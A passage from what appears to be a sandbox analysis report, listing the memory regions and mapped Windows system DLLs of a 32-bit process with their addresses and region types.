filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 810 start_va = 0x71770000 end_va = 0x717befff entry_point = 0x71770000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 811 start_va = 0x71760000 end_va = 0x71767fff entry_point = 0x71760000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 812 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 813 start_va = 0x76510000 end_va = 0x76685fff entry_point = 0x76510000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 814 start_va = 0x76870000 end_va = 0x7695ffff entry_point = 0x76870000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 888 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 889 start_va = 0x1d0000 end_va = 0x28dfff entry_point = 0x1d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 890 start_va = 0x73f90000 end_va = 0x74020fff entry_point = 0x73f90000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 891 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 892 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 893 start_va = 0x490000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 894 start_va = 0x4d0000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 895 start_va = 0x73e10000 end_va = 0x73e19fff entry_point = 0x73e10000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 896 start_va = 0x73e20000 end_va = 0x73e3bfff entry_point = 0x73e20000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 897 start_va = 0x73e40000 end_va = 0x73e4bfff entry_point = 0x73e40000 region_type = mapped_file name = "traffic.dll" filename = "\\Windows\\SysWOW64\\traffic.dll" (normalized: "c:\\windows\\syswow64\\traffic.dll") Region: id = 898 start_va = 0x73e50000 end_va = 0x73e5efff entry_point = 0x73e50000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\SysWOW64\\wtsapi32.dll" (normalized: "c:\\windows\\syswow64\\wtsapi32.dll") Region: id = 899 start_va = 0x73e60000 end_va = 0x73eb2fff entry_point = 0x73e60000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\SysWOW64\\oleacc.dll" (normalized: "c:\\windows\\syswow64\\oleacc.dll") Region: id = 900 start_va = 0x73ec0000 end_va = 0x73ed2fff entry_point = 0x73ec0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 901 start_va = 0x73ee0000 end_va = 0x73f71fff entry_point = 0x73ee0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll") Region: id = 902 start_va = 0x73f80000 end_va = 0x73f87fff entry_point = 0x73f80000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 903 start_va = 0x74030000 end_va = 0x74088fff entry_point = 0x74030000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 904 start_va = 0x74090000 end_va = 0x74099fff entry_point = 0x74090000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 905 start_va = 0x740a0000 end_va = 0x740bdfff entry_point = 0x740a0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 906 start_va = 0x740e0000 end_va = 0x7422cfff entry_point = 0x740e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 907 start_va = 0x74230000 end_va = 0x743e9fff entry_point = 0x74230000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 908 start_va = 0x74580000 end_va = 0x745c2fff entry_point = 0x74580000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 909 start_va = 0x746f0000 end_va = 0x74733fff entry_point = 0x746f0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 910 start_va = 0x747d0000 end_va = 0x75b8efff entry_point = 0x747d0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 911 start_va = 0x75b90000 end_va = 0x75c1cfff entry_point = 0x75b90000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 912 start_va = 0x75c80000 end_va = 0x75c86fff entry_point = 0x75c80000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 913 start_va = 0x75c90000 end_va = 0x75e34fff entry_point = 0x75c90000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 914 start_va = 0x75e40000 end_va = 0x75efdfff entry_point = 0x75e40000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 915 start_va = 0x75f00000 end_va = 0x75fe9fff entry_point = 0x75f00000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 916 start_va = 0x75ff0000 end_va = 0x76033fff entry_point = 0x75ff0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 917 start_va = 0x76040000 end_va = 0x760bafff entry_point = 0x76040000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 918 start_va = 0x760c0000 end_va = 0x760cbfff entry_point = 0x760c0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 919 start_va = 0x761e0000 end_va = 0x76271fff entry_point = 0x761e0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 920 start_va = 0x762d0000 end_va = 0x7637bfff entry_point = 0x762d0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 921 start_va = 0x76410000 end_va = 0x76445fff entry_point = 0x76410000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 922 start_va = 0x76690000 end_va = 0x7669efff entry_point = 0x76690000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 923 start_va = 0x766a0000 end_va = 0x766fbfff entry_point = 0x766a0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 924 start_va = 0x76960000 end_va = 0x76e3cfff entry_point = 0x76960000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 925 start_va = 0x76e40000 end_va = 0x76f7ffff entry_point = 0x76e40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 926 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 927 start_va = 0x5d0000 end_va = 0x60ffff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 928 start_va = 0x610000 end_va = 0x70ffff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 929 start_va = 0x710000 end_va = 0x897fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 930 start_va = 0x8d0000 end_va = 0x8dffff entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 931 start_va = 0x73d90000 end_va = 0x73daafff entry_point = 0x73d90000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 932 start_va = 0x73db0000 end_va = 0x73db7fff entry_point = 0x73db0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 933 start_va = 0x73dc0000 end_va = 0x73dcffff entry_point = 0x73dc0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 934 start_va = 0x73dd0000 end_va = 0x73dddfff entry_point = 0x73dd0000 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\SysWOW64\\wmiclnt.dll" (normalized: "c:\\windows\\syswow64\\wmiclnt.dll") Region: id = 935 start_va = 0x73de0000 end_va = 0x73e0ffff entry_point = 0x73de0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 936 start_va = 0x745d0000 end_va = 0x746effff entry_point = 0x745d0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 937 start_va = 0x74740000 end_va = 0x7476afff entry_point = 0x74740000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 938 start_va = 0x7ffd5000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 939 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 940 start_va = 0x290000 end_va = 0x290fff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 941 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x2a0000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\SysWOW64\\oleaccrc.dll" (normalized: "c:\\windows\\syswow64\\oleaccrc.dll") Region: id = 942 start_va = 0x2b0000 end_va = 0x2b1fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 943 start_va = 0x3d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 944 start_va = 0x3e0000 end_va = 0x3e3fff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 945 start_va = 0x8e0000 end_va = 0xa60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 946 start_va = 0xa70000 end_va = 0x1e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a70000" filename = "" Region: id = 947 start_va = 0x1f90000 end_va = 0x1f9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 948 start_va = 0x1fa0000 end_va = 0x211ffff entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 949 start_va = 0x1e70000 end_va = 0x1eaffff entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 950 start_va = 0x1fa0000 end_va = 0x209ffff entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 951 start_va = 0x2110000 end_va = 0x211ffff entry_point = 0x0 region_type = private name = "private_0x0000000002110000" filename = "" Region: id = 952 start_va = 0x7fead000 end_va = 0x7feaffff entry_point = 0x0 region_type = private name = "private_0x000000007fead000" filename = "" Region: id = 953 start_va = 0x73d10000 end_va = 0x73d84fff entry_point = 0x73d10000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 954 start_va = 0x2120000 end_va = 0x225ffff entry_point = 0x0 region_type = private name = "private_0x0000000002120000" filename = "" Region: id = 955 start_va = 0x1eb0000 end_va = 0x1f2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001eb0000" filename = "" Region: id = 956 start_va = 0x3f0000 end_va = 0x3f3fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 957 start_va = 0x2260000 end_va = 0x2596fff entry_point = 0x2260000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 958 start_va = 0x8a0000 end_va = 0x8a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 959 start_va = 0x2120000 end_va = 0x21d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002120000" filename = "" Region: id = 960 start_va = 0x2250000 end_va = 0x225ffff entry_point = 0x0 region_type = private name = "private_0x0000000002250000" filename = "" Region: id = 961 start_va = 0x8a0000 end_va = 0x8a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 962 start_va = 0x8b0000 end_va = 0x8b3fff entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 963 start_va = 0x73980000 end_va = 0x7399cfff entry_point = 0x73980000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 964 start_va = 0x8c0000 end_va = 0x8c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 965 start_va = 0x73b00000 end_va = 0x73d08fff entry_point = 0x73b00000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_3bccb1ff6bcd1849\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_3bccb1ff6bcd1849\\comctl32.dll") Region: id = 966 start_va = 0x1f30000 end_va = 0x1f30fff entry_point = 0x1f30000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 967 start_va = 0x1f40000 end_va = 0x1f41fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f40000" filename = "" Region: id = 968 start_va = 0x1f30000 end_va = 0x1f30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f30000" filename = "" Region: id = 969 start_va = 0x1f30000 end_va = 0x1f30fff entry_point = 0x0 region_type = private name = "private_0x0000000001f30000" filename = "" Region: id = 970 start_va = 0x1f50000 end_va = 0x1f5bfff entry_point = 0x0 region_type = private name = "private_0x0000000001f50000" filename = "" Region: id = 971 start_va = 0x1f60000 end_va = 0x1f60fff entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 972 start_va = 0x1f70000 end_va = 0x1f70fff entry_point = 0x0 region_type = private name = "private_0x0000000001f70000" filename = "" Region: id = 973 start_va = 0x1f80000 end_va = 0x1f80fff entry_point = 0x0 region_type = private name = "private_0x0000000001f80000" filename = "" Region: id = 974 start_va = 0x73ab0000 end_va = 0x73af3fff entry_point = 0x73ab0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 975 start_va = 0x25a0000 end_va = 0x269ffff entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 976 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 977 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 978 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 979 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 980 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 981 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 982 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 983 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 984 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 985 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 986 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 987 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 988 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 989 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 990 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 991 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 992 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 993 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 994 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 995 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 996 start_va = 0x26a0000 end_va = 0x279ffff entry_point = 0x0 region_type = private name = "private_0x00000000026a0000" filename = "" Region: id = 997 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 998 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 999 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 1000 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 1001 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 1002 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 1003 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 1004 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 1005 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 1006 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 1007 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 1008 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 1009 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 1010 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 1011 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 1012 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 1013 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 1014 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 1015 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 1016 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 1017 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 1018 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 1019 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 1020 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 1021 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 1022 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 1023 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 1024 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 1025 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 1026 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 1027 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 1028 start_va = 0x27a0000 end_va = 0x299ffff entry_point = 0x0 region_type = private name = "private_0x00000000027a0000" filename = "" Region: id = 1029 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 1030 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 1031 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 1032 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 1033 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 1034 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 1035 start_va = 0x74400000 end_va = 0x74574fff entry_point = 0x74400000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 1036 start_va = 0x760d0000 end_va = 0x760ddfff entry_point = 0x760d0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 1037 start_va = 0x20a0000 end_va = 0x20affff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 1038 start_va = 0x29a0000 end_va = 0x2a9ffff entry_point = 0x0 region_type = private name = "private_0x00000000029a0000" filename = "" Region: id = 1039 start_va = 0x20b0000 end_va = 0x20b4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020b0000" filename = "" Region: id = 1040 start_va = 0x20a0000 end_va = 0x20a4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020a0000" filename = "" Region: id = 1041 start_va = 0x20a0000 end_va = 0x20a4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020a0000" filename = "" Region: id = 1042 start_va = 0x20a0000 end_va = 0x20a4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020a0000" filename = "" Region: id = 1043 start_va = 0x20a0000 end_va = 0x20a4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020a0000" filename = "" Region: id = 1044 start_va = 0x20a0000 end_va = 0x20a4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020a0000" filename = "" Region: id = 1045 start_va = 0x20a0000 end_va = 0x20a4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020a0000" filename = "" Region: id = 1046 start_va = 0x20a0000 end_va = 0x20a4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020a0000" filename = "" Region: id = 1047 start_va = 0x20a0000 end_va = 0x20a4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020a0000" filename = "" Region: id = 1048 start_va = 0x20a0000 end_va = 0x20a4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020a0000" filename = "" Region: id = 1049 start_va = 0x20a0000 end_va = 0x20a4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020a0000" filename = "" Region: id = 1050 start_va = 0x20a0000 end_va = 0x20a4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020a0000" filename = "" Region: id = 1051 start_va = 0x20a0000 end_va = 0x20a4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020a0000" filename = "" Region: id = 1052 start_va = 0x20a0000 end_va = 0x20a4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020a0000" filename = "" Region: id = 1053 start_va = 0x20a0000 end_va = 0x20a4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020a0000" filename = "" Region: id = 1054 start_va = 0x20a0000 end_va = 0x20a4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020a0000" filename = "" Region: id = 1055 start_va = 0x20a0000 end_va = 0x20a4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020a0000" filename = "" Region: id = 1056 start_va = 0x20a0000 end_va = 0x20a4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020a0000" filename = "" 